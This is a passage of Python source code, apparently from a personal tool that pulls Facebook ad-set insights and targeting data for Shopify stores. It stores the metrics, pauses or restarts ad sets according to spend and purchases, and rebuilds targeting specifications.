redprint("Running 'update_adsetinsight_data_find_which_adset_had_the_order' ... ")
for adset in Adset.objects.filter(is_created=True):
self.shop = Shop()( adset.shop_abbreviation)
data = [AttrDict(i.export_all_data()) for i in AdSet(adset.adset_id).get_insights(fields = fields, params={"time_increment": time_increment, "time_range": {"since": (Date()-date_start).datestr,"until": (Date()-date_end).datestr}})]
adset_shopify_order_matches = []
for i in data:
new = Adsetinsight()
existing = Adsetinsight.objects.filter(adset_id = adset.adset_id, date = Date().myDatetimenow(Date(i.date_start).dateobj))
if len(existing) == 1:
new = existing[0]
print("an existing")
actions = i.get("actions", {})
action_values = i.get("action_values", {})
actions_dict = AttrDict(dict(zip(key("action_type", actions), key("value", actions))))
action_values_dict = AttrDict(dict(zip(key("action_type", action_values), key("value", action_values))))
spend = round(float(i.spend), 4)
adset_id = adset.adset_id
date = Date().myDatetimenow(Date(i.date_start).dateobj)
frequency = round(float(i.frequency), 4)
impression = int(i.impressions)
if(0==impression):continue
impression_cost = round(float(tryreturn(lambda: spend / impression)), 4)
impression_rate = 0
post_click = int(i.clicks)
post_click_cost = round(float(tryreturn(lambda: spend / post_click)), 4)
post_click_rate = round(float(tryreturn(lambda: post_click / impression)), 4)
click = int(actions_dict.get("link_click", 0))
click_cost = round(float(tryreturn(lambda: spend / click)), 4)
click_rate = round(float(tryreturn(lambda: click / impression)), 4)
add_to_cart = int(actions_dict.get("offsite_conversion.fb_pixel_add_to_cart", 0))
add_to_cart_cost = round(float(tryreturn(lambda: spend / add_to_cart)), 4)
try:add_to_cart_rate = round(float(tryreturn(lambda: add_to_cart / impression)), 4)
except:add_to_cart_rate = 0 #(?)
website_purchase = int(actions_dict.get("offsite_conversion.fb_pixel_purchase", 0))
#conversion_pixel_purchase = int(actions_dict.get("offsite_conversion", 0))
#if website_purchase > 0 and conversion_pixel_purchase == 0:
# website_purchase = website_purchase
#if website_purchase > 0 and conversion_pixel_purchase > 0:
# website_purchase = ((website_purchase+conversion_pixel_purchase) / 2)
#if website_purchase == 0 and conversion_pixel_purchase > 0:
# website_purchase = conversion_pixel_purchase
website_purchase_cost = round(float(tryreturn(lambda: spend / website_purchase)), 4)
website_purchase_rate = round(float(tryreturn(lambda: website_purchase / impression)), 4)
spend = round(float(i.spend), 4)
website_purchase_value = round(float(action_values_dict.get("offsite_conversion.fb_pixel_purchase", 0)), 4)
return_on_investment = round(float(tryreturn(lambda: website_purchase_value / spend)), 4)
reach = int(i.reach)
reach_cost = round(float(tryreturn(lambda: spend / reach)), 4)
reach_rate = 0
landing_page_view = int(actions_dict.get("landing_page_view", 0))
landing_page_view_cost = round(float(tryreturn(lambda: spend / landing_page_view)), 4)
landing_page_view_rate = round(float(tryreturn(lambda: landing_page_view / impression)), 4)
fb_pixel_view_content = int(actions_dict.get("offsite_conversion.fb_pixel_view_content", 0))
fb_pixel_view_content_cost = round(float(tryreturn(lambda: spend / fb_pixel_view_content)), 4)
fb_pixel_view_content_rate = round(float(fb_pixel_view_content / impression), 4)
fb_pixel_initiate_checkout = int(actions_dict.get("offsite_conversion.fb_pixel_initiate_checkout", 0))
fb_pixel_initiate_checkout_cost = round(float(tryreturn(lambda: spend / fb_pixel_initiate_checkout)), 4)
fb_pixel_initiate_checkout_rate = round(float(fb_pixel_initiate_checkout / impression), 4)
page_engagement = int(actions_dict.get("page_engagement", 0))
page_engagement_cost = round(float(tryreturn(lambda: spend / page_engagement)), 4)
page_engagement_rate = round(float(page_engagement / impression), 4)
post_engagement = int(actions_dict.get("post_engagement", 0))
post_engagement_cost = round(float(tryreturn(lambda: spend / post_engagement)), 4)
post_engagement_rate = round(float(post_engagement / impression), 4)
post_reaction = int(actions_dict.get("post_reaction", 0))
post_reaction_cost = round(float(tryreturn(lambda: spend / post_reaction)), 4)
post_reaction_rate = round(float(post_reaction / impression), 4)
if is_a_shopify_order_match_check == True:
if len(existing) == 1:
if existing[0].website_purchase > website_purchase:
print("Found a new conversion for this Ad Set. Adding it to ")
adset_shopify_order_matches.append(existing[0])
print("\n")
redprint("adset-shopify-order-matches: %s | is_a_shopify_order_match_check_orders (count of shopify orders): %s" % (len(adset_shopify_order_matches), len(is_a_shopify_order_match_check_orders)) )
print("\n")
""" since this is so bad: the factors are [count_new_purchases, count_new_orders, count_new_adsets, matching_by_order_difference, and how badly this matters,-- of course you can assume 1 order at most per minute]"""
# run analysis here, -2 indents b/c the assumption is for i in data(of adset) iterates through 1 adset | keep it here, which will be fine for the next since you are saving the variables: order AND adset
if (is_a_shopify_order_match_check==True) and (len(adset_shopify_order_matches)==1) and (len(is_a_shopify_order_match_check_orders)==1) :
adset_shopify_order_match = adset_shopify_order_matches[0]
adset_shopify_order_match.order_ids.append(is_a_shopify_order_match_check_orders[0].id)
adset_shopify_order_match.save()
#elif (is_a_shopify_order_match_check==True) and (len(adset_shopify_order_matches)!=len(is_a_shopify_order_match_check_orders)) :
# """ This occurs when, for example, is_a_shopify_order_match_check_orders > 1 (say 2) and that count differs from adset_shopify_order_matches: two sales are confirmed in Shopify but fewer (one or zero) adsets show new orders. """
# """ Assuming a 0-10 second pixel-update window, the zero-adset case still needs handling: treat it as "the purchase should have posted" while "no new purchase has been recorded yet". """
# """ Otherwise a different kind of match is needed, choosing which of the two order_ids to attach to the adset: route 1 picks the order whose created time (in seconds) is closest to the adset update time; route 2 picks the order whose amount is closest to the adset's value increase. """
# """ Route 1 is open: it is unclear whether the purchase time is available to the minute or second. """
# for adset in adset_shopify_order_matches:
# price_differences = []
# for shopify_order in is_a_shopify_order_match_check_orders:
# adset_value_increase = website_purchase_value - existing[0].website_purchase_value
# price_difference = adset_value_increase - total_price
# price_differences.append([shopify_order, price_difference])
# smallest_difference = min(price_differences)
# for price_difference in price_differences:
# if price_difference[1] == smallest_difference:
# print("price_difference of %s == smallest_difference: %s"% (price_difference[1], smallest_difference))
# shopify_order = price_difference[0]
# adset.order_ids = [] if adset.order_ids == None else adset.order_ids
# adset.order_ids.append(shopify.order_id)
# print("adset of id: %s which has previous conversion value of %s and now current conversion value of %s now is matched with order id: %s of total amount %s" % (existing[0].adset_id, existing[0].website_purchase_value, website_purchase_value, shopify_order.id, shopify_order.total_amount))
#elif (is_a_shopify_order_match_check==True) and (len(adset_shopify_order_matches)!=len(is_a_shopify_order_match_check_orders)) :
# # try to match by price as well. assuming 2 new orders, 2 new adsets with orders. if the case 2 new orders 1 new adset with orders, then due to the price match -- that 1 new adset will
# for adset in adset_shopify_order_matches:
# price_differences = []
# for shopify_order in is_a_shopify_order_match_check_orders:
# adset_value_increase = website_purchase_value - existing[0].website_purchase_value
# price_difference = adset_value_increase - total_price
# price_differences.append([shopify_order, price_difference])
# smallest_difference = min(price_differences)
# for price_difference in price_differences:
# if price_difference[1] == smallest_difference:
# print("price_difference of %s == smallest_difference: %s"% (price_difference[1], smallest_difference))
# shopify_order = price_difference[0]
# adset.order_ids = [] if adset.order_ids == None else adset.order_ids
# adset.order_ids.append(shopify.order_id)
# print("adset of id: %s which has previous conversion value of %s and now current conversion value of %s now is matched with order id: %s of total amount %s" % (existing[0].adset_id, existing[0].website_purchase_value, website_purchase_value, shopify_order.id, shopify_order.total_amount))
print("spend: %s"% spend)
print("adset_id: %s"% adset_id)
print("date: %s"% date)
print("frequency: %s"% frequency)
print("impression: %s"% impression)
print("impression_cost: %s"% impression_cost)
print("impression_rate: %s"% impression_rate)
print("post_click: %s"% post_click)
print("post_click_cost: %s"% post_click_cost)
print("post_click_rate: %s"% post_click_rate)
print("click: %s"% click)
print("click_cost: %s"% click_cost)
print("click_rate: %s"% click_rate)
print("add_to_cart: %s"% add_to_cart)
print("add_to_cart_cost: %s"% add_to_cart_cost)
print("add_to_cart_rate: %s"% add_to_cart_rate)
print("website_purchase: %s"% website_purchase)
print("website_purchase_cost: %s"% website_purchase_cost)
print("website_purchase_rate: %s"% website_purchase_rate)
print("spend: %s"% spend)
print("website_purchase_value: %s"% website_purchase_value)
print("return_on_investment: %s"% return_on_investment)
print("reach: %s"% reach)
print("reach_cost: %s"% reach_cost)
print("reach_rate: %s"% reach_rate)
print("landing_page_view: %s"% landing_page_view)
print("landing_page_view_cost: %s"% landing_page_view_cost)
print("landing_page_view_rate: %s"% landing_page_view_rate)
print("fb_pixel_view_content: %s"% fb_pixel_view_content)
print("fb_pixel_view_content_cost: %s"% fb_pixel_view_content_cost)
print("fb_pixel_view_content_rate: %s"% fb_pixel_view_content_rate)
print("fb_pixel_initiate_checkout: %s"% fb_pixel_initiate_checkout)
print("fb_pixel_initiate_checkout_cost: %s"% fb_pixel_initiate_checkout_cost)
print("fb_pixel_initiate_checkout_rate: %s"% fb_pixel_initiate_checkout_rate)
print("page_engagement: %s"% page_engagement)
print("page_engagement_cost: %s"% page_engagement_cost)
print("page_engagement_rate: %s"% page_engagement_rate)
print("post_engagement: %s"% post_engagement)
print("post_engagement_cost: %s"% post_engagement_cost)
print("post_engagement_rate: %s"% post_engagement_rate)
print("post_reaction: %s"% post_reaction)
print("post_reaction_cost: %s"% post_reaction_cost)
print("post_reaction_rate: %s"% post_reaction_rate)
new.spend = spend
new.ad_account_id = self.shop.Facebook_Business_Ad_Account_ID
new.adset_id = adset_id
new.date = date
new.frequency = frequency
new.impression = impression
new.impression_cost = impression_cost
new.impression_rate = impression_rate
new.post_click = post_click
new.post_click_cost = post_click_cost
new.post_click_rate = post_click_rate
new.click = click
new.click_cost = click_cost
new.click_rate = click_rate
new.add_to_cart = add_to_cart
new.add_to_cart_cost = add_to_cart_cost
new.add_to_cart_rate = add_to_cart_rate
new.website_purchase = website_purchase
new.website_purchase_cost = website_purchase_cost
new.website_purchase_rate = website_purchase_rate
new.spend = spend
new.website_purchase_value = website_purchase_value
new.return_on_investment = return_on_investment
new.reach = reach
new.reach_cost = reach_cost
new.reach_rate = reach_rate
new.landing_page_view = landing_page_view
new.landing_page_view_cost = landing_page_view_cost
new.landing_page_view_rate = landing_page_view_rate
new.fb_pixel_view_content = fb_pixel_view_content
new.fb_pixel_view_content_cost = fb_pixel_view_content_cost
new.fb_pixel_view_content_rate = fb_pixel_view_content_rate
new.fb_pixel_initiate_checkout = fb_pixel_initiate_checkout
new.fb_pixel_initiate_checkout_cost = fb_pixel_initiate_checkout_cost
new.fb_pixel_initiate_checkout_rate = fb_pixel_initiate_checkout_rate
new.page_engagement = page_engagement
new.page_engagement_cost = page_engagement_cost
new.page_engagement_rate = page_engagement_rate
new.post_engagement = post_engagement
new.post_engagement_cost = post_engagement_cost
new.post_engagement_rate = post_engagement_rate
new.post_reaction = post_reaction
new.post_reaction_cost = post_reaction_cost
new.post_reaction_rate = post_reaction_rate
#new.save()
new.save()
# 2. Stop AdSets based on today- data
def stop_adset_based_on_today_data(self, id):
todays_date = int(Date().myDatetimenow())
# check it out. i filtered adset insights to those which will have the id.
adsetinsights = Adsetinsight.objects.filter(date=todays_date, adset_id=id)
#cyanprint("[Count active today][%s]"%len(adsetinsights))
for adsetinsight in adsetinsights:
if Adset.objects.get(adset_id=adsetinsight.adset_id).status == "ACTIVE":
if (adsetinsight.spend >= 20 and adsetinsight.website_purchase == 0):# or (adsetinsight.impression_cost > .015 and adsetinsight.website_purchase == 0):
redprint("[stop_adsets_based_on_today_data][%s][%s][%s] [%s]['!=OK']"%(adsetinsight.adset_id,adsetinsight.spend,adsetinsight.impression_cost,adsetinsight.website_purchase))
July_Adset_Utilities().pause_adset(adset_id=adsetinsight.adset_id)
else:
greenprint("[%s][%s][%s] [%s]['OK']"%(adsetinsight.adset_id,adsetinsight.spend,adsetinsight.impression_cost,adsetinsight.website_purchase))
# 1. Stop AdSets based on summation data
def stop_adset_based_on_past_data(self, id):
# TODO: consider printing these fields as full sentences; the bare values are hard to parse when scanning the output.
todays_date = int(Date().myDatetimenow())
# check it out, i filtered adset insights to those containing this id as the adset_id
adsetinsights = Adsetinsight.objects.filter(date=todays_date, adset_id=id)
print("[Count active today][%s]"%len(adsetinsights))
""" this will be a unique iteration for adsetinsights with date(delivery) today AND with adset_id """
adset_ids_unique = list(sorted(list(set(key("adset_id", adsetinsights)))))
for adset_id in adset_ids_unique:
adsetinsights = Adsetinsight.objects.filter(adset_id = adset_id)
adsetinsights = keysort("date", adsetinsights)
spend = 0
website_purchase = 0
days = 0
cyanprint("[%s][activedays][%s]"%(adset_id,len(adsetinsights)))
for adsetinsight in adsetinsights:
spend += adsetinsight.spend
website_purchase += adsetinsight.website_purchase
days += 1
#input("? ? ? ? ? ? ? ? ?")
if Adset.objects.get(adset_id=adsetinsight.adset_id).status == "ACTIVE":
if (spend >= 20 and website_purchase == 0):
redprint("[stop_adsets_based_on_past_data][%s][%s][%s][%s]['!=OK']"%(adsetinsight.date, days, spend, website_purchase))
July_Adset_Utilities().pause_adset(adset_id=adsetinsight.adset_id)
else:
greenprint("[%s][%s][%s][%s]['OK']"%(adsetinsight.date, days, spend, website_purchase))
def restart_adset_based_on_today_data(self, id):
# Goal Is Restart If Sale
#todays_date = int(Date().myDatetimenow())
#adsetinsights = Adsetinsight.objects.filter(date=todays_date)
#cyanprint("[Count active today][%s]"%len(adsetinsights))
#for adsetinsight in adsetinsights:
# if Adset.objects.get(adset_id=adsetinsight.adset_id).status == "PAUSED":
# print(adsetinsight.id, adsetinsight.website_purchase)
# if (adsetinsight.website_purchase > 0):
# redprint("[restart_adsets_based_on_today_data][%s][%s][%s] [%s]['!=OK']"%(adsetinsight.adset_id,adsetinsight.spend,adsetinsight.impression_cost,adsetinsight.website_purchase))
# July_Adset_Utilities().restart_adset(adset_id=adsetinsight.adset_id)
# else:
# greenprint("[%s][%s][%s][%s] [%s]['OK']"%(adsetinsight.id,adsetinsight.adset_id,adsetinsight.spend,adsetinsight.impression_cost,adsetinsight.website_purchase))
todays_date = int(Date().myDatetimenow())
adsetinsight = tryreturn(Get, Adsetinsight, date=todays_date)
if(0==adsetinsight): print("No adsetinsight to restart adset on todays data with"); return
print(adsetinsight.id, adsetinsight.website_purchase)
if (adsetinsight.website_purchase > 0):
greenprint("[restart_adsets_based_on_today_data][%s][%s][%s] [%s]['!=OK']"%(adsetinsight.adset_id,adsetinsight.spend,adsetinsight.impression_cost,adsetinsight.website_purchase))
July_Adset_Utilities().restart_adset(adset_id=adsetinsight.adset_id)
else:
redprint("[%s][%s][%s][%s] [%s]['OK']"%(adsetinsight.id,adsetinsight.adset_id,adsetinsight.spend,adsetinsight.impression_cost,adsetinsight.website_purchase))
todays_date = int(Date().myDatetimenow())
print(adsetinsight.id, adsetinsight.website_purchase)
adsetinsight.save()
def update_ad_keyword_data(self, id):
time.sleep(2)
distinct_print("\nupdate_ad_keyword_data\n")
fields = ["actions", "clicks", "frequency", "impressions", "reach", "spend",]
#if (Adset.objects.get(adset_id=adset_id).date_last_requested_keyword_stats != None) and ( (int(Date().myDatetimenow()) - Adset.objects.get(adset_id=adset_id).date_last_requested_keyword_stats) < 7):
# # (date_last_requested_keyword_stats defaults to 0); skip if keyword stats were requested within the last 7 days. Example: day 200 was the last request, so on day 208 the range 201-207 is sent because 208 - 200 = 8 > 7.
# continue
adset = Filter(Adset,adset_id=id)[0]
adset_id = id
if Adset.objects.get(adset_id=adset_id).date_last_requested_keyword_stats == None:
adset = Adset.objects.get(adset_id=adset_id); adset.date_last_requested_keyword_stats = 0; adset.save()
date_last_requested_keyword_stats_time_length = ((int(Date().myDatetimenow()-1) - Adset.objects.get(adset_id=adset_id).date_last_requested_keyword_stats))
distinct_print("date last requested keyword stats time length: %s" % date_last_requested_keyword_stats_time_length)
if (date_last_requested_keyword_stats_time_length >= 1) == False:
return None
Shop()(Adset.objects.get(adset_id=adset_id).shop_abbreviation)
adset = AdSet(adset_id)
ad = None
ads = adset.get_ads()
if len(ads) == 0:
return
ad = ads[0]
q=[]
data = []
dates = lmap(lambda i: (Date()-i)().strftime("%Y-%m-%d"), [8,7,6,5,4,3,2])
for i in dates:
keyword_stats = ad.get_keyword_stats(fields=fields,params={"date":i})
# print(keyword_stats)
if len(keyword_stats) > 0:
q.append(keyword_stats)
keyword_stat = keyword_stats[0].export_all_data()
for a in keyword_stat:
keyword_stat[a]["date"] = Date().myDatetimenow(Date(i)())
x = keyword_stat[a]
distinct_print(":Keyword Stat:\nImpressions:%s, Reach: %s, Spend: %s, Date: %s, Name: %s"%(x["impressions"], x["reach"], x["spend"], x["date"], a))
keyword_stat = AttrDict(keyword_stat)
data.append(keyword_stat)
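# Illustrative shape of keyword_stat after the export above (names and values are placeholders):
# {'Yoga': {'id': '6002866718622', 'impressions': '1200', 'reach': '900', 'spend': '4.5',
#           'clicks': '30', 'actions': [{'action_type': 'link_click', 'value': '12'}], 'date': 20181216}}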
#[2018.12.18 8:03:55 AM]Removed for ascii errordistinct_print("adset id, %s, len data, %s" % (adset_id, len(data)))
#[2018.12.18 8:03:55 AM]Removed for ascii errordistinct_print(data[-1])
print("\n\n")
#input("continue")
for keyword_stat in data:
for name,values in keyword_stat.items():
new = Interestinsight()
existing = Interestinsight.objects.filter(adset_id = adset_id, date = values.date, interest_name = name)
if len(existing) == 1:
new = existing[0]
#asciidistinct_print("[existing][adset_id][date][interest_name][%s][%s][%s]"%(adset_id,values.date,name))
""
elif len(existing) == 0:
#asciidistinct_print("[addition][adset_id][date][interest_name][%s][%s][%s]"%(adset_id,values.date,name))
""
new.adset_id = adset_id
new.date = values.date
new.interest_name = name
try:actions = AttrDict(keyword_stat[name]).actions
except: actions = {}
try:actions_dict = AttrDict(dict(zip(key("action_type", actions), key("value", actions))))
except:actions_dict = {}
interest_id = int(values.id)
interest_name = name
spend = getattr(new,"spend",0) + float(values.get("spend",0))
reach = getattr(new,"reach",0) + int(values.get("reach",0))
impression = getattr(new,"impression",0) + int(values.get("impressions",0))
click = getattr(new,"click",0) + int(actions_dict.get("link_click",0))
post_click = getattr(new,"post_click",0) + int(values.get("clicks", 0))
add_to_cart = getattr(new,"add_to_cart",0) + int(actions_dict.get("offsite_conversion.fb_pixel_add_to_cart",0))
website_purchase = getattr(new,"website_purchase",0) + int(actions_dict.get("offsite_conversion.fb_pixel_purchase", 0))
page_engagement = getattr(new,"page_engagement",0) + int(actions_dict.get("page_engagement",0))
photo_view = getattr(new,"photo_view",0) + int(actions_dict.get("photo_view",0))
post_engagement = getattr(new,"post_engagement",0) + int(actions_dict.get("post_engagement",0))
post_like = getattr(new,"post_like",0) + int(actions_dict.get("post_like",0))
new.interest_id = interest_id
new.interest_name = interest_name
new.spend = spend
new.reach = reach
new.impression = impression
new.click = click
new.post_click = post_click
new.add_to_cart = add_to_cart
new.website_purchase = website_purchase
new.page_engagement = page_engagement
new.photo_view = photo_view
new.post_engagement = post_engagement
new.post_like = post_like
new.save()
adset = Adset.objects.get(adset_id=adset_id)
adset.date_last_requested_keyword_stats = int(Date().myDatetimenow()-1)
#print("[%s][%s][%s]" % (adset_id, interest_name, adset.date_last_requested_keyword_stats))
adset.save()
#input("?: ")
def update_adset_targeting_data(self, id):
adset_id = id
adset = AdSet(adset_id)
Shop()(Adset.objects.get(adset_id=adset_id).shop_abbreviation)
data = AttrDict(adset.remote_read(fields=["daily_budget", "created_time","effective_status","targeting","attribution_spec","promoted_object","billing_event","optimization_goal","recommendations","bid_info","name","source_adset_id"]).export_all_data())
attribution_spec_dict = dict(zip(key("event_type", data.attribution_spec), key("window_days", data.attribution_spec)))
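# Illustrative shape of the two structures above (window values are placeholders):
# data.attribution_spec ~ [{'event_type': 'CLICK_THROUGH', 'window_days': 28}, {'event_type': 'VIEW_THROUGH', 'window_days': 1}]
# attribution_spec_dict ~ {'CLICK_THROUGH': 28, 'VIEW_THROUGH': 1}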
flexible_spec1 = None
flexible_spec2 = None
flexible_spec3 = None
flexible_spec4 = None
flexible_spec5 = None
created_time = datetime.strptime('-'.join(data.get("created_time").split("-")[:-1]), '%Y-%m-%dT%H:%M:%S')
click_attribution = attribution_spec_dict.get("CLICK_THROUGH", 0)
view_attribution = attribution_spec_dict.get("VIEW_THROUGH", 0)
custom_event_type = data.promoted_object.custom_event_type
billing_event = data.billing_event
optimization_goal = data.optimization_goal
recommendations = data.get("recommendations", "")
bid_info = data.get("bid_info", "")
device_platforms = list(sorted(data.targeting.get("device_platforms", [])))
publisher_platforms = list(sorted(data.targeting.get("publisher_platforms", [])))
facebook_positions = list(sorted(data.targeting.get("facebook_positions", [])))
print(data)
targeting_optimization = data.targeting.get("targeting_optimization","none")
user_device = list(sorted(data.targeting.get("user_device", [])))
user_os = list(sorted(data.targeting.get("user_os", [])))
age_min = data.targeting.age_min
age_max = data.targeting.age_max
genders = data.targeting.get("genders", [0])[0] # 2 is F, 1 is M, 0 is Both?
geo_locations = list(sorted(data.targeting.geo_locations.countries))
status = data.get("effective_status")
name = data.get("name")
daily_budget = float(data.get("daily_budget")) / 100
source_adset_id = data.get("source_adset_id", None)
custom_audiences = data.targeting.get("custom_audiences", None)
#body = Null
#try:
# try:
# v = AdSet(adset_id).get_ads()[0].get_ad_creatives()[0].remote_read(fields=["effective_object_story_id", "body"])
# body = v["body"]
# effective_object_story_id = v["effective_object_story_id"]
# body_url = re.findall(r"[a-zA-Z]*.com.*",body)
# distinct_print(body_url)
#
#
# except:
# """ an error here means an ad or creative was deleted and database needs to delete adset, """
# magentaprint("[adset_id][%s]"%adset_id)
# try:mysql_delete(Adset.objects.get(id=adset_id)) # continue # ( no effective object story id )
# except:pass
# if body == Null: 0/0
#except Exception as e:
# redprint(e)
# F L E X I B L E S P E C
flexible_specs_ordered_list = []
interest_dicts = {}
""" ::: Add Friendly Part In Here, you want to save the Facebookkeywordlist for all things 1 len ::: """
## testing
#return data
#return data.targeting.flexible_spec
## testing
if "flexible_spec" in data.targeting: # here add line say, only if flexible_spec in targeting
if(1==len(data.targeting.flexible_spec)):
x = data.targeting.flexible_spec[0]
October_Keyword_Utilities().receive_interest_dictlist(x.get("interests"), niche=getattr(Get(Adset,adset_id=adset_id),"niche",None))
""" ::: Add Friendly Part In Here, you want to save the Facebookkeywordlist for all things 1 len ::: """
try:
for idx,i in enumerate(data.targeting.flexible_spec):
interest_dictlist = i["interests"]
interest_dict = dict(zip(list(map(int, key("id", interest_dictlist))), list(map(str, key("name", interest_dictlist)))))
interest_dict_id_sum = sum(list(map(int, interest_dict.keys())))
interest_dicts[interest_dict_id_sum] = interest_dict
for idx, id_sum in enumerate(list(sorted(interest_dicts.keys()))):
flexible_specs_ordered_list.append(interest_dicts[id_sum])
for idx,flexible_spec in enumerate(flexible_specs_ordered_list):
sorted_interest_ids = list(sorted(flexible_spec.keys()))
ordered_interests = []
for interest_id in sorted_interest_ids:
interest_name = flexible_spec[interest_id]
ordered_interests.append([interest_id, interest_name])
flexible_specs_ordered_list[idx] = ordered_interests
if len(flexible_specs_ordered_list) > 0:
flexible_spec1 = flexible_specs_ordered_list[0]
if len(flexible_specs_ordered_list) > 1:
flexible_spec2 = flexible_specs_ordered_list[1]
if len(flexible_specs_ordered_list) > 2:
flexible_spec3 = flexible_specs_ordered_list[2]
if len(flexible_specs_ordered_list) > 3:
flexible_spec4 = flexible_specs_ordered_list[3]
if len(flexible_specs_ordered_list) > 4:
flexible_spec5 = flexible_specs_ordered_list[4]
except Exception as e:
redprint("[no interests][error: %s]"%e)
# F L E X I B L E S P E C
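# Worked example of the ordering above (ids and names are illustrative only): given two flexible specs,
# one with interest id 6002866718622 and one with ids 6003107902433 and 6003139266461, the single-interest
# spec has the smaller id sum and so becomes flexible_spec1, and within each spec interests are listed in
# ascending id order, e.g. flexible_spec1 = [[6002866718622, 'Yoga']] and
# flexible_spec2 = [[6003107902433, 'Running'], [6003139266461, 'Fitness']].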
redprint("[%s][update_adset_targeting_data][created_time][%s]" % (adset["id"],created_time))
redprint("[%s][update_adset_targeting_data][attribution_spec_dict][%s]" % (adset["id"],attribution_spec_dict))
redprint("[%s][update_adset_targeting_data][click_attribution][%s]" % (adset["id"],click_attribution))
redprint("[%s][update_adset_targeting_data][view_attribution][%s]" % (adset["id"],view_attribution))
redprint("[%s][update_adset_targeting_data][custom_event_type][%s]" % (adset["id"],custom_event_type))
redprint("[%s][update_adset_targeting_data][billing_event][%s]" % (adset["id"],billing_event))
redprint("[%s][update_adset_targeting_data][optimization_goal][%s]" % (adset["id"],optimization_goal))
redprint("[%s][update_adset_targeting_data][recommendations][%s]" % (adset["id"],recommendations))
redprint("[%s][update_adset_targeting_data][bid_info][%s]" % (adset["id"],bid_info))
redprint("[%s][update_adset_targeting_data][device_platforms][%s]" % (adset["id"],device_platforms))
redprint("[%s][update_adset_targeting_data][publisher_platforms][%s]" % (adset["id"],publisher_platforms))
redprint("[%s][update_adset_targeting_data][facebook_positions][%s]" % (adset["id"],facebook_positions))
redprint("[%s][update_adset_targeting_data][targeting_optimization][%s]" % (adset["id"],targeting_optimization))
redprint("[%s][update_adset_targeting_data][user_device][%s]" % (adset["id"],user_device))
redprint("[%s][update_adset_targeting_data][user_os][%s]" % (adset["id"],user_os))
redprint("[%s][update_adset_targeting_data][age_min][%s]" % (adset["id"],age_min))
redprint("[%s][update_adset_targeting_data][age_max][%s]" % (adset["id"],age_max))
redprint("[%s][update_adset_targeting_data][genders][%s]" % (adset["id"],genders))
redprint("[%s][update_adset_targeting_data][geo_locations][%s]" % (adset["id"],geo_locations))
redprint("[%s][update_adset_targeting_data][name][%s]" % (adset["id"],name))
#redprint("[%s][update_adset_targeting_data][body][%s]" % (adset["id"],body))
#redprint("[%s][update_adset_targeting_data][effective_object_story_id][%s]" % (adset["id"],effective_object_story_id))
redprint("[%s][update_adset_targeting_data][daily_budget][%s]" % (adset["id"],daily_budget))
#@[2018.12.17 12:25 AM]for ascii redprint("[%s][update_adset_targeting_data][flexible_spec1][%s]" % (adset["id"],flexible_spec1))
#@[2018.12.17 12:25 AM]for ascii redprint("[%s][update_adset_targeting_data][flexible_spec2][%s]" % (adset["id"],flexible_spec2))
#@[2018.12.17 12:25 AM]for ascii redprint("[%s][update_adset_targeting_data][flexible_spec3][%s]" % (adset["id"],flexible_spec3))
#@[2018.12.17 12:25 AM]for ascii redprint("[%s][update_adset_targeting_data][flexible_spec4][%s]" % (adset["id"],flexible_spec4))
#@[2018.12.17 12:25 AM]for ascii redprint("[%s][update_adset_targeting_data][flexible_spec5][%s]" % (adset["id"],flexible_spec5))
adset = Adset.objects.get(adset_id=adset_id)
adset.created_time = created_time
adset.click_attribution = click_attribution
adset.view_attribution = view_attribution
adset.custom_event_type = custom_event_type
adset.billing_event = billing_event
adset.optimization_goal = optimization_goal
adset.recommendations = recommendations
adset.bid_info = dict(bid_info)
adset.device_platforms = device_platforms
adset.publisher_platforms = publisher_platforms
adset.facebook_positions = facebook_positions
adset.targeting_optimization = targeting_optimization
adset.user_device = user_device
adset.user_os = user_os
adset.age_min = age_min
adset.age_max = age_max
adset.genders = genders
adset.geo_locations = geo_locations
adset.status = status
adset.name = name
adset.daily_budget = daily_budget
#adset.body = body
#adset.effective_object_story_id = effective_object_story_id
adset.source_adset_id = source_adset_id
adset.custom_audiences = custom_audiences
adset.flexible_spec1 = flexible_spec1
adset.flexible_spec2 = flexible_spec2
adset.flexible_spec3 = flexible_spec3
adset.flexible_spec4 = flexible_spec4
adset.flexible_spec5 = flexible_spec5
adset.save()
def database_fields_to_data(self, adset_id):
adset = Adset.objects.get(adset_id=adset_id)
x = {}
x = AttrDict(x)
if adset.click_attribution:
x.attribution_spec = [] if "attribution_spec" not in x else x.attribution_spec
x.attribution_spec.append({'event_type': 'CLICK_THROUGH', 'window_days': adset.click_attribution})
if adset.view_attribution:
x.attribution_spec = [] if "attribution_spec" not in x else x.attribution_spec
x.attribution_spec.append({'event_type': 'VIEW_THROUGH', 'window_days': adset.view_attribution})
if adset.custom_event_type:
x.promoted_object = {} if "promoted_object" not in x else x.promoted_object
x.promoted_object.custom_event_type = adset.custom_event_type
x.promoted_object.pixel_id = Shop.objects.get(shop_abbreviation = adset.shop_abbreviation).Facebook_Pixel_ID
x.promoted_object.pixel_rule = '{"event":{"eq":"%s"}}' % adset.custom_event_type.title()
if adset.billing_event:
x.targeting = {} if "targeting" not in x else x.targeting
x.billing_event = adset.billing_event
if adset.optimization_goal:
x.optimization_goal = adset.optimization_goal
if adset.recommendations:
pass
if adset.bid_info:
pass
redprint("[No information set on what to do in event of a bid_info field as of 7/20/18]")
if adset.device_platforms:
x.targeting = {} if "targeting" not in x else x.targeting
x.targeting.device_platforms = adset.device_platforms
if adset.facebook_positions:
x.targeting = {} if "targeting" not in x else x.targeting
x.targeting.facebook_positions = adset.facebook_positions
if adset.publisher_platforms:
x.targeting = {} if "targeting" not in x else x.targeting
x.targeting.publisher_platforms = adset.publisher_platforms
if adset.targeting_optimization:
x.targeting = {} if "targeting" not in x else x.targeting
x.targeting.targeting_optimization = adset.targeting_optimization
if adset.user_device:
x.targeting = {} if "targeting" not in x else x.targeting
x.targeting.user_device = adset.user_device
if adset.user_os:
x.targeting = {} if "targeting" not in x else x.targeting
x.targeting.user_os = adset.user_os
if adset.age_min:
x.targeting = {} if "targeting" not in x else x.targeting
x.targeting.age_min = adset.age_min
if adset.age_max:
x.targeting = {} if "targeting" not in x else x.targeting
x.targeting.age_max = adset.age_max
if adset.genders:
x.targeting = {} if "targeting" not in x else x.targeting
x.targeting.genders = [adset.genders]
if adset.geo_locations:
x.targeting = {} if "targeting" not in x else x.targeting
x.targeting.geo_locations = {'countries': adset.geo_locations, 'location_types': ['home', 'recent']}
if adset.status:
x.status = adset.status
# flexible_spec fields store [interest_id, interest_name] pairs; rebuild Facebook's {"id", "name"} format and accumulate specs instead of overwriting earlier ones.
if adset.flexible_spec1:
x.targeting = {} if "targeting" not in x else x.targeting
x.targeting.flexible_spec = [] if "flexible_spec" not in x.targeting else x.targeting.flexible_spec
